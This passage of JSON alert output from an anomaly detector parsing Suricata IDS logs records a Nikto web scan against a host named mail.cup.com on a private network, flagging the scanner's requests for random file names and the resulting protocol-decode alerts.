"/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.EXE", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.233382+0000\",\"flow_id\":1641910146599993,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46846,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.EXE\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.EXE\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.233382, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1641910146599993,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46846,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.EXE\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.EXE\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46846,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.EXE\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.EXE\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.EXE\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.EXE\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.EXE", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.EXE", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46846,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46846, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1641910146599993,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1641910146599993, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.233382+0000\",\"flow_id\":1641910146599993,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46846,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.EXE\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.EXE\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.23 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.235199 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46848 -> 192.168.10.154:80", "/parser/model/time": 1583349514.235199, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46848, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.235199 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46848 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.java", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.235367+0000\",\"flow_id\":1729286961271675,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46848,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.java\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.java\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.235367, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1729286961271675,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46848,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.java\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.java\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46848,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.java\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.java\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.java\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.java\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.java", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.java", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46848,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46848, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1729286961271675,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1729286961271675, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.235367+0000\",\"flow_id\":1729286961271675,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46848,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.java\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.java\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.236933 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46850 -> 192.168.10.154:80", "/parser/model/time": 1583349514.236933, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46850, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.236933 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46850 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.conf", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.237117+0000\",\"flow_id\":656541569686162,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46850,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.conf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.conf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.237117, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":656541569686162,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46850,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.conf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.conf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46850,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.conf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.conf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.conf\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.conf\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.conf", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.conf", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46850,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46850, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":656541569686162,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 656541569686162, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.237117+0000\",\"flow_id\":656541569686162,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46850,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.conf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.conf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.24 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.239413 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46852 -> 